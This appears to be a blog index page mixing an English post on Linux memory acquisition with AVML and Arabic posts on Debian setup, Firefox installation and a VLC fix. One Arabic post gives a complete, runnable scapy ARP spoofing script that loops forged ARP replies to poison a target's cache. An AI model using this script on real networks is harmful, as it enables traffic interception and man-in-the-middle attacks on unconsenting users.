Acquiring Linux Memory using AVML and Using it with Volatility

This is another quick post going over the process to acquire memory from a Linux system, but instead of using LiME, I’m going to use AVML which stands for Acquire Volatile Memory for Linux, and could be found here. The tool has been developed by Brian Casewell for Microsoft and is a “userland volatile memory acquisition tool”.

AVML tries to acquire memory from the following memory sources:

    /dev/crash
    /proc/kcore
    /dev/mem

The installation is straight forward and well documented on the Github page. I used the build on Ubuntu, which is really just “copy & paste” no super power required there, thanks to Brian! One note is there are two builds, one will provide an upload feature to upload the images to Azure and the other build without that. The size is really small, mine with full features was 5.5MB. After finishing the build you will find the binary (at least on my system) under:

./target/x86_64-unknown-linux-musl/release/

Continue reading

سكربت بسيط لعمل ARP Spoofing

سكربت بسيط لعمل ARP Spoofing … قم بنسخ الكود وتشغيله او تحميله من صفحة المشاريع (هنا) …

#!/usr/bin/env python
import sys, time
from scapy.all import sendp, ARP, Ether

if len (sys.argv) < 4:
	print "Usage\n:"
	print sys.argv[0] + "   "
	print "./arpSpoofer.py eth0 192.168.1.56 192.168.1.100"	
	sys.exit (1)

networkInterface = str(sys.argv[1])
targetIPAddr = sys.argv[2]
spoofedIPAddr = sys.argv[3]

# Assembling the Spoofed Packet
spoofedPacket = Ether() / ARP(pdst=targetIPAddr, psrc=spoofedIPAddr, op="is-at")

# Start Spoofing (aka Poisoning) :)
while True:
	sendp(spoofedPacket, iface=networkInterface)
	time.sleep (1)

المزيد من التجارب في الطريق إن شاء الله :)

ما بعد تنصيب Debian 6 Squeeze

بالنسبة لي بعد أن قمت بتنصيب التوزيعة قمت بإضافة المستودعات التي أحتاجها … وبالنسبة لي هذه هي المستودعات التي أفضلها بصراحة … غيري لربما يفضل مستودعات آخرى لكن أنا أستعمل المستودعات التالية: قم بتحميلها من هنا

بعد ذلك كل الذي عليك عمله هو إضافتهم الى مستودعاتك أو تبديلهم بمستودعاتك وعمل:

apt-get update
apt-get upgrade

إذا واجهتك مشاكل في مفاتيح GPG الخاصة بالمستودعات قم بالبحث عنها في مواقعها الخاصة … يعني: مفتاح جوجل من موقع جوجل وهكذا …
Continue reading

Install Firefox on Debian

بعد المشاكل التي حصلت لدي كان يجب ان اعيد العمل مرة أخرى ولهذا سأقوم بتدوين الأمور لعل أحتاجها في المستقبل … أول حاجة قمت بها هو تحميل وتركيب المتصفح فايرفوكس … كل ما عليك فعله هو تحميل المتصفح من هنا … بعد ذلك لك حرية الإختيار بين تخزينه في المجلد /opt/ او المجلد /usr/share/ عني أستعمل الأخير … قم بفك الضغط عن الملف ونقله الى هناك … إذا كان الجهاز يستعمله أكثر من شخص فيفضل أن تعطيه الصلاحيات التالية:

chown -R root:users /usr/share/firefox

وإذا لم يكن فلو تركته كما هو لا يوجد مشكلة … بالحالة أعلاه كل من هو عضو في مجموعة users له صلاحيات لإستعمال المتصفح … بعد لنقم بعمل symbolic link لتشغيل المتصفح:

ln -s /usr/share/firefox/firefox /usr/bin/firefox

الآن لنعمل أيقونة لسطح المكتب:

touch /usr/share/applications/firefox.desktop

Continue reading

مشكلة vlc مع ملفات الفيديو (avi, flv) على Debian 6

في الفترة الماضية عانيت من مشكلة في برنامج VLC على توزيعة دبيان 6 … حيث لا يستطيع تشغيل ملفات الـ AVI ولا الـ FLV التي نحملها من اليوتيوب وغيرها من مواقع الفيديو … البرنامج يقوم بتشغيل الصوت ولكن بدون صورة … حاولت التلاعب بمشغل المستعمل من قبل البرنامج ولكن دون فائدة … ولكن بعد بحث طويل وجدت إن الخلل كان بسبب مستودعت Debian Multimedia … ولهذا قمت بحذفهم من ملف source.list وأتبعت الخطوات التي بالأسفل لإصلاح الخلل …

sudo vim /etc/apt/sources.list

قم بحذف جميع السطور المتعلقة بـ debian-multimedia.org من خلال وضع # قبل ذلك السطر … بعد ذلك قم بتحديث المخازن لديك:

sudo apt-get update

الآن قم بحذف أي حزمة متعلقة بالمكتبة libavutil من خلال الأمر الذي بالأسفل … هذه الخطوة ستقوم بحذف الكثير من الملفات … لا تقلق يمكن إضافتهم لاحقاً …

sudo apt-get remove libavutil*

Continue reading